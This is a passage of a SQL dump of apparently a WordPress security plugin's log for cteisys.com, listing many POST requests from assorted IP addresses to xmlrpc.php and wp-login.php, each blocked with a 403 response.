Firefox\\/96\"}','O9NZit4RKbJsm1awHPULrMq3',0,1664442161.6225,18391,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eNqLFxkMlg3TIXoWZvdO42Au',0,1664442538.7368,19064,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IgRGFXjztU4loamH0sreLwDx',0,1664443017.6513,18816,'','POST',403,0,515,0,1,'',0),('39.106.15.209',661262289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iyLBghdKqPaz8wV5k2r4sQlj',0,1664443119.3552,4007,'','POST',403,0,515,0,1,'',0),('62.102.148.156',1046910108,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mdr1HDfUXtxkNT3bQRo4iC8s',0,1664443250.8393,18683,'','POST',403,0,515,0,1,'',0),('184.75.223.219',3091980251,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6ROCc0FrJxnSuYf48wq9GMeV',0,1664443315.8576,1305,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FY6m8ORdHZlW3nPoTArUheCx',0,1664443482.6954,2058,'','POST',403,0,515,0,1,'',0),('87.106.228.6',1466622982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EDryCtfbGZOUWxnR36sei9S5',0,1664444067.8473,18664,'','POST',403,0,515,0,1,'',0),('47.104.66.61',795361853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3ac9onrwzBWdpCSZOXquPi1G',0,1664444468.8628,2287,'','POST',403,0,515,0,1,'',0),('198.98.49.240',3328324080,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','cdKJxF29CUkvqueG0r1DS4hb',0,1664444530.4293,17059,'','POST',403,0,600,0,1,'',0),('64.71.32.81',1078403153,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','faZ9t6Nc2m3TiDuCIhJ0Ukwo',0,1664444549.4752,1115,'','POST',403,0,515,0,1,'',0),('81.68.150.77',1363449421,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','tqZC7GjyTebRs0c5NMHYSWFz',0,1664444552.5296,529,'','POST',403,0,515,0,1,'',0),('159.89.170.41',2673453609,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','95oSOP38g624demzBWtkRlrv',0,1664444555.0113,1109,'','POST',403,0,515,0,1,'',0),('154.197.48.10',2596614154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','dkicwVqA4sem1bOv7KyMB6Ea',0,1664444555.3889,969,'','POST',403,0,515,0,1,'',0),('74.208.18.17',1255150097,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','nMRovgJY79qpBD81AsGaKPVd',0,1664444564.8362,891,'','POST',403,0,515,0,1,'',0),('185.25.23.57',3105429305,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','JyLfT0V7vt9OGDbSr8oZRx2z',0,1664444565.2917,1519,'','POST',403,0,515,0,1,'',0),('64.227.190.34',1088667170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','r3YbD0PpThBXSFfjQ4Zzvc2A',0,1664444570.8152,489,'','POST',403,0,515,0,1,'',0),('207.244.246.140',3488937612,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','ATIR1SQDrK8psHL63ugPkvUw',0,1664444575.4572,513,'','POST',403,0,515,0,1,'',0),('13.126.77.35',226381091,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','LhmguvIqyc7TWZlB2FozUdrD',0,1664444582.1418,1369,'','POST',403,0,515,0,1,'',0),('203.156.136.113',3416033393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','OiABTurMPKkV6Ltdv9pqJ7Dc',0,1664444585.8960,486,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','rQgzYuUCFH7JTqi1ybpceLBE',0,1664444592.0413,491,'','POST',403,0,515,0,1,'',0),('154.197.48.10',2596614154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','wryloIG69aRS2KTNdeAu7gqU',0,1664444600.8274,494,'','POST',403,0,515,0,1,'',0),('68.183.15.215',1152847831,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','B2pvYUCrNkMiuXoQGbIs4Ltf',0,1664444912.7386,18160,'','POST',403,0,515,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xXe7mqw8UpOLdAogEFVsyDQu',0,1664445025.3436,2225,'','POST',403,0,515,0,1,'',0),('139.59.20.111',2335904879,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','svaw6ObUJtL4V5NWQ973zRjD',0,1664445417.3836,2454,'','POST',403,0,515,0,1,'',0),('13.126.36.87',226370647,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c8wz3ZjUfnNyCoJma6QD259X',0,1664445526.0182,1303,'','POST',403,0,515,0,1,'',0),('162.240.211.236',2733691884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fzD3RTpFZP6HC8hyjMkV1l5n',0,1664445907.2633,18932,'','POST',403,0,515,0,1,'',0),('139.196.152.3',2344916995,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9hDdAfP4L8FuvlaNTX1UjGeZ',0,1664446514.5237,20334,'','POST',403,0,515,0,1,'',0),('118.27.125.16',1981512976,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','lQxnPwZiFKfUbotLke25DM9H',0,1664446546.3731,1933,'','POST',403,0,515,0,1,'',0),('220.85.221.65',3696614721,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','OhimdR7TeDW1Y39JM26USnoI',0,1664446549.3856,694,'','POST',403,0,515,0,1,'',0),('89.46.107.98',1496214370,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','0KeO15pAmIRqJP4ftw2oTWFN',0,1664446554.9898,517,'','POST',403,0,515,0,1,'',0),('89.46.107.98',1496214370,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','IqoACXGPz6UMlYFRjuBn0K1c',0,1664446575.5127,602,'','POST',403,0,515,0,1,'',0),('128.127.106.229',2155834085,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','rlo4dv1yp8zshgeI2tAE5jGP',0,1664446580.8593,495,'','POST',403,0,515,0,1,'',0),('13.64.60.246',222313718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','CzEg9xGN1oTwUP3d7vu0DHYq',0,1664446586.4518,500,'','POST',403,0,515,0,1,'',0),('123.56.5.185',2067269049,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','9V4uiOLUBwK2DRtyCJ3nIh0S',0,1664446587.9424,579,'','POST',403,0,515,0,1,'',0),('185.107.113.160',3110826400,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','rgWcx5aMotj2YpmSNLAdz70D',0,1664446594.2920,8858,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','jBbfESW3xRnG50iyJowXF27U',0,1664446599.3491,3805,'','POST',403,0,515,0,1,'',0),('128.199.54.204',2160539340,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','X4LK7zCHmskJGyhpD1S23w5u',0,1664446599.5092,3691,'','POST',403,0,515,0,1,'',0),('118.98.64.188',1986150588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AKeybcfNi3RUTv0kBXlJQPgM',0,1664446897.7943,19083,'','POST',403,0,515,0,1,'',0),('195.206.105.203',3285084619,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qIg8ZXO5uJr2LwyFEtCQosPU',0,1664446992.9672,18615,'','POST',403,0,515,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bSIq8csWFKUjQBMV4X6NCat3',0,1664447411.5143,20715,'','POST',403,0,515,0,1,'',0),('101.99.3.20',1700987668,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','MqTcGVmKgUbd9iLZRWSv217t',0,1664447540.3581,3397,'','POST',403,0,515,0,1,'',0),('119.8.58.8',1997027848,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','yfITRc8qnph73xjZa5oNtsuC',0,1664447526.3643,17393,'','POST',403,0,515,0,1,'',0),('95.217.226.51',1608114739,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','Srq1w54hTlagKC6bXiF0OsBc',0,1664447540.3111,3489,'','POST',403,0,515,0,1,'',0),('118.27.125.16',1981512976,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Kx3DvzGwm4MyWgR9l1jQnPIZ',0,1664447549.3255,632,'','POST',403,0,515,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','HMvVD3QwcGuqy517jaT9ipmJ',0,1664447557.9470,775,'','POST',403,0,515,0,1,'',0),('178.128.2.114',2994733682,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','e9mEqySPTYwAtUDJzRV8oGXZ',0,1664447558.5295,692,'','POST',403,0,515,0,1,'',0),('202.74.239.117',3393908597,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','CAgYGuLJ71tqEaIW942DpH6O',0,1664447573.6843,1231,'','POST',403,0,515,0,1,'',0),('103.163.138.21',1738770965,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','GABjLP081TgEHb4DIYQFZwrf',0,1664447585.5630,1374,'','POST',403,0,515,0,1,'',0),('178.20.231.167',2987714471,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','AvDhBkK48Ce9cP2uNSoUrqfs',0,1664447591.3864,502,'','POST',403,0,515,0,1,'',0),('203.156.136.113',3416033393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','WnKB9IVdy276szmtHQ1MfJpc',0,1664447602.6573,546,'','POST',403,0,515,0,1,'',0),('120.79.8.125',2018445437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MpIi9LQr5aZw6s4RhbFqWuem',0,1664447910.3754,19350,'','POST',403,0,515,0,1,'',0),('51.15.160.148',856662164,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NEBtOk2vn0TA4sdoPUb6rV7q',0,1664448038.9604,19050,'','POST',403,0,515,0,1,'',0),('107.189.3.40',1807549224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','4Yo1rkTVdRgbPcHSUpy9uDQ5',0,1664448364.5795,2042,'','POST',403,0,600,0,1,'',0),('171.244.21.74',2884900170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','ADcYCPFzeEoOGpwtBn3WfJs4',0,1664448424.1197,2372,'','POST',403,0,515,0,1,'',0),('188.166.211.48',3165049648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','L5N2r3tXDGgWPBUZQJSMEkeo',0,1664448536.8818,18427,'','POST',403,0,515,0,1,'',0),('72.167.51.34',1218917154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZLwxiUeGVPamkp4zMjOQKb8l',0,1664448925.9305,21573,'','POST',403,0,515,0,1,'',0),('104.131.189.63',1753464127,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Bpn3A1ey7LmTutZjYbaIGO2H',0,1664449449.4755,18735,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','HsWyknb8MtSNq1cE7Of0QIFJ',0,1664449494.9987,492,'','POST',403,0,600,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IAcky03M5ObV6rtLWzq91uZP',0,1664449568.6155,2266,'','POST',403,0,515,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MPRNBsKHeSU0rLxcGw5TazXA',0,1664449932.5556,18828,'','POST',403,0,515,0,1,'',0),('72.9.145.140',1208586636,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2QjWIJyPkp7vlLYFqgSXKUCZ',0,1664450055.5844,18683,'','POST',403,0,515,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','o9LVs1DSvGfuHOYtmEh2RBgI',0,1664450468.8414,18960,'','POST',403,0,515,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','0AjgV6zZ4DQvqhtaPykom2np',0,1664450960.1793,17971,'','POST',403,0,515,0,1,'',0),('38.242.205.84',653446484,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Db1tpV3saGIzBrZ76fPWhveL',0,1664450966.4027,11751,'','POST',403,0,515,0,1,'',0),('178.20.231.167',2987714471,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','tv8QdAsO91PumiFkyqUolzMK',0,1664450962.9952,15194,'','POST',403,0,515,0,1,'',0),('222.124.3.203',3732669387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','OBKrwEIFjxlA3YfuiSVGa0MR',0,1664450981.3001,507,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','kp4RLe8gBhM0mV7X3i5Csfz1',0,1664450986.0267,1254,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','QS3v4O2DdI5LgJpjc6CVNfAq',0,1664450990.3466,519,'','POST',403,0,515,0,1,'',0),('46.252.18.29',788271645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','a8rU56ZtAfcXIDpJoEPxwCmB',0,1664450998.3145,593,'','POST',403,0,515,0,1,'',0),('198.46.81.40',3324924200,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','5zI72AmkBrSCXWpYb3uNxFQf',0,1664451001.1417,1562,'','POST',403,0,515,0,1,'',0),('178.128.2.114',2994733682,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','8A2Xrgszu6jlBKL4DoayptCH',0,1664451013.3096,1330,'','POST',403,0,515,0,1,'',0),('185.102.88.47',3110492207,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','WaUwEsxoLM5IVbj0Agz6c1mt',0,1664451013.4281,1253,'','POST',403,0,515,0,1,'',0),('23.88.4.230',391644390,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','Qd6AewUuKisxICGRHotXSJbm',0,1664451050.6816,1468,'','POST',403,0,515,0,1,'',0),('31.172.80.147',531386515,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YkiJnAELNDI5gQtoFUjye76r',0,1664451095.7961,689,'','POST',403,0,515,0,1,'',0),('114.132.201.19',1921304851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DdbyRFCUV3hEX1o8MvwSKBZI',0,1664451591.4684,19627,'','POST',403,0,515,0,1,'',0),('209.87.239.76',3512201036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5Zezrxb8i0QKEFOT1ukpVoa4',0,1664451998.7703,18414,'','POST',403,0,515,0,1,'',0),('162.144.49.214',2727358934,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6zg4aRToL0B8wZqupKikdJQ9',0,1664452129.7351,13634,'','POST',403,0,515,0,1,'',0),('205.185.124.182',3451485366,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','4FQRxWcYh9umvbqPAUXdMp7T',0,1664452294.1861,19159,'','POST',403,0,600,0,1,'',0),('207.244.239.41',3488935721,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2KQO87i3obFDmCUEHRdepIkV',0,1664452501.6823,18286,'','POST',403,0,515,0,1,'',0),('185.126.219.43',3112098603,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JRB7CnYWEz6fxHc5gS4ILbK9',0,1664452648.8983,11560,'','POST',403,0,515,0,1,'',0),('192.249.124.141',3237575821,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','TyZUYszMdre31hqO0cAN8wS5',0,1664452940.2695,1469,'','POST',403,0,515,0,1,'',0),('47.106.207.43',795529003,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','uv8OKpE49LgzPHd5cBlWnoRf',0,1664452950.0212,1117,'','POST',403,0,515,0,1,'',0),('89.46.106.142',1496214158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','dV2rlWxbTGukinXOKCYAD3qZ',0,1664452950.4223,1011,'','POST',403,0,515,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','7NS5b1st8zCQYymglcj2r4JV',0,1664452963.1235,1088,'','POST',403,0,515,0,1,'',0),('14.225.3.211',249627603,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','Wycinz9QE1baVxeJkP0fjDNT',0,1664452963.4044,1004,'','POST',403,0,515,0,1,'',0),('47.111.130.128',795837056,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','DXy3JMYol9OKFhxH1LU8f7rz',0,1664452979.5395,1334,'','POST',403,0,515,0,1,'',0),('188.68.47.69',3158585157,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','srGjzFVvLWMpCQUHtKARSihI',0,1664452986.1441,1145,'','POST',403,0,515,0,1,'',0),('92.204.239.12',1556934412,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6PpIVASwXQsx5FRMeo9mjvEf',0,1664452986.7971,897,'','POST',403,0,515,0,1,'',0),('40.127.0.239',679411951,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile 